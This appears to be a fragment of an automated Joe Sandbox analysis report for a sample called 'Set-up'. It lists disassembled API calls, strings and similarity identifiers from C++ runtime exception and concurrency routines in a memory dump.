                                                                                                • Part of subcall function 6BC20D64: _CxxThrowException.MSVCR100(?,6BC4CACC), ref: 6BC20D8F
                                                                                                • Part of subcall function 6BC20D64: ??0exception@std@@QAE@ABQBD@Z.MSVCR100(?), ref: 6BC20DAF
                                                                                                • Part of subcall function 6BC20D64: _CxxThrowException.MSVCR100(?,6BC484B4), ref: 6BC20DC5
                                                                                                • Part of subcall function 6BC20D64: ??0exception@std@@QAE@ABQBD@Z.MSVCR100(?), ref: 6BC20DE5
                                                                                                • Part of subcall function 6BC20D64: _CxxThrowException.MSVCR100(?,6BC4C9D0), ref: 6BC20DFB
                                                                                                • Part of subcall function 6BC20D64: ??0exception@std@@QAE@ABV01@@Z.MSVCR100(?,?,?,?,6BC4C9D0), ref: 6BC20E11
                                                                                              • memmove.MSVCR100(?,?,?), ref: 6BC25E85
                                                                                              Strings
                                                                                              • invalid string position, xrefs: 6BC25E42
                                                                                              Similarity
                                                                                              • API ID: ??0exception@std@@$ExceptionThrow$V01@@Xout_of_range@std@@memmove
                                                                                              • String ID: invalid string position
                                                                                              • API String ID: 3646397376-1799206989
                                                                                              APIs
                                                                                              • ??0invalid_operation@Concurrency@@QAE@PBD@Z.MSVCR100(sync_send called without registering a callback), ref: 6BC180B3
                                                                                              • _CxxThrowException.MSVCR100(?,6BC4C880), ref: 6BC180C3
                                                                                                • Part of subcall function 6BC18D62: ??0_Scoped_lock@_NonReentrantPPLLock@details@Concurrency@@QAE@AAV123@@Z.MSVCR100(?), ref: 6BC18D6E
                                                                                                • Part of subcall function 6BC18D62: ??1_Scoped_lock@_NonReentrantPPLLock@details@Concurrency@@QAE@XZ.MSVCR100 ref: 6BC18D88
                                                                                              Strings
                                                                                              • sync_send called without registering a callback, xrefs: 6BC180AA
                                                                                              Similarity
                                                                                              • API ID: Concurrency@@$Lock@details@ReentrantScoped_lock@_$??0_??0invalid_operation@??1_ExceptionThrowV123@@
                                                                                              • String ID: sync_send called without registering a callback
                                                                                              • API String ID: 427308038-4178601950
                                                                                              APIs
                                                                                              • ??0exception@std@@QAE@ABQBD@Z.MSVCR100(?), ref: 6BC1AE09
                                                                                              • _CxxThrowException.MSVCR100(?,6BC4C848), ref: 6BC1AE1F
                                                                                              Strings
                                                                                              Similarity
                                                                                              • API ID: ??0exception@std@@ExceptionThrow
                                                                                              • String ID: _PTarget
                                                                                              • API String ID: 2684170311-988830941
                                                                                              APIs
                                                                                              Strings
                                                                                              Similarity
                                                                                              • API ID: _create_locale_ui64toa_s
                                                                                              • String ID: .
                                                                                              • API String ID: 194611966-248832578
                                                                                              APIs
                                                                                              • ??0exception@std@@QAE@ABQBD@Z.MSVCR100(00000000), ref: 6BC19A7C
                                                                                              • _CxxThrowException.MSVCR100(6BC123F4,6BC4C848), ref: 6BC19A92
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000008.00000002.2150334894.000000006BC11000.00000020.00000001.01000000.0000000F.sdmp, Offset: 6BC10000, based on PE: true
                                                                                              • Associated: 00000008.00000002.2149818963.000000006BC10000.00000002.00000001.01000000.0000000F.sdmp
                                                                                              • Associated: 00000008.00000002.2151807645.000000006BC6E000.00000004.00000001.01000000.0000000F.sdmp
                                                                                              • Associated: 00000008.00000002.2152116355.000000006BC72000.00000002.00000001.01000000.0000000F.sdmp
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_8_2_6bc10000_Set-up.jbxd
                                                                                              Similarity
                                                                                              • API ID: ??0exception@std@@ExceptionThrow
                                                                                              • String ID: _PTarget
                                                                                              • API String ID: 2684170311-988830941
                                                                                              APIs
                                                                                              • ??0exception@std@@QAE@ABQBD@Z.MSVCR100(00000002), ref: 6BC1A9F7
                                                                                              • _CxxThrowException.MSVCR100(?,6BC4C848), ref: 6BC1AA0D
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000008.00000002.2150334894.000000006BC11000.00000020.00000001.01000000.0000000F.sdmp, Offset: 6BC10000, based on PE: true
                                                                                              • Associated: 00000008.00000002.2149818963.000000006BC10000.00000002.00000001.01000000.0000000F.sdmp
                                                                                              • Associated: 00000008.00000002.2151807645.000000006BC6E000.00000004.00000001.01000000.0000000F.sdmp
                                                                                              • Associated: 00000008.00000002.2152116355.000000006BC72000.00000002.00000001.01000000.0000000F.sdmp
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_8_2_6bc10000_Set-up.jbxd
                                                                                              Similarity
                                                                                              • API ID: ??0exception@std@@ExceptionThrow
                                                                                              • String ID: _PSource
                                                                                              • API String ID: 2684170311-588581970
                                                                                              APIs
                                                                                              • ??0invalid_link_target@Concurrency@@QAE@PBD@Z.MSVCR100(_Link), ref: 6BC16DEE
                                                                                              • _CxxThrowException.MSVCR100(?,6BC4C8B8), ref: 6BC16DFD
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000008.00000002.2150334894.000000006BC11000.00000020.00000001.01000000.0000000F.sdmp, Offset: 6BC10000, based on PE: true
                                                                                              • Associated: 00000008.00000002.2149818963.000000006BC10000.00000002.00000001.01000000.0000000F.sdmp
                                                                                              • Associated: 00000008.00000002.2151807645.000000006BC6E000.00000004.00000001.01000000.0000000F.sdmp
                                                                                              • Associated: 00000008.00000002.2152116355.000000006BC72000.00000002.00000001.01000000.0000000F.sdmp
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_8_2_6bc10000_Set-up.jbxd
                                                                                              Similarity
                                                                                              • API ID: ??0invalid_link_target@Concurrency@@ExceptionThrow
                                                                                              • String ID: _Link
                                                                                              • API String ID: 3916662256-3418048212
                                                                                              APIs
                                                                                              • ??0invalid_operation@Concurrency@@QAE@PBD@Z.MSVCR100(Deleting link registry before removing all the links), ref: 6BC16DB6
                                                                                              • _CxxThrowException.MSVCR100(6BC1AA73,6BC4C880), ref: 6BC16DC5
                                                                                              Strings
                                                                                              • Deleting link registry before removing all the links, xrefs: 6BC16DAE
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000008.00000002.2150334894.000000006BC11000.00000020.00000001.01000000.0000000F.sdmp, Offset: 6BC10000, based on PE: true
                                                                                              • Associated: 00000008.00000002.2149818963.000000006BC10000.00000002.00000001.01000000.0000000F.sdmp
                                                                                              • Associated: 00000008.00000002.2151807645.000000006BC6E000.00000004.00000001.01000000.0000000F.sdmp
                                                                                              • Associated: 00000008.00000002.2152116355.000000006BC72000.00000002.00000001.01000000.0000000F.sdmp
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_8_2_6bc10000_Set-up.jbxd
                                                                                              Similarity
                                                                                              • API ID: ??0invalid_operation@Concurrency@@ExceptionThrow
                                                                                              • String ID: Deleting link registry before removing all the links
                                                                                              • API String ID: 1760184552-1123019286
                                                                                              APIs
                                                                                              • ??0invalid_operation@Concurrency@@QAE@PBD@Z.MSVCR100(Deleting link registry before removing all the links), ref: 6BC1B181
                                                                                              • _CxxThrowException.MSVCR100(6BC12B80,6BC4C880), ref: 6BC1B190
                                                                                              Strings
                                                                                              • Deleting link registry before removing all the links, xrefs: 6BC1B179
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000008.00000002.2150334894.000000006BC11000.00000020.00000001.01000000.0000000F.sdmp, Offset: 6BC10000, based on PE: true
                                                                                              • Associated: 00000008.00000002.2149818963.000000006BC10000.00000002.00000001.01000000.0000000F.sdmp
                                                                                              • Associated: 00000008.00000002.2151807645.000000006BC6E000.00000004.00000001.01000000.0000000F.sdmp
                                                                                              • Associated: 00000008.00000002.2152116355.000000006BC72000.00000002.00000001.01000000.0000000F.sdmp
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_8_2_6bc10000_Set-up.jbxd
                                                                                              Similarity
                                                                                              • API ID: ??0invalid_operation@Concurrency@@ExceptionThrow
                                                                                              • String ID: Deleting link registry before removing all the links
                                                                                              • API String ID: 1760184552-1123019286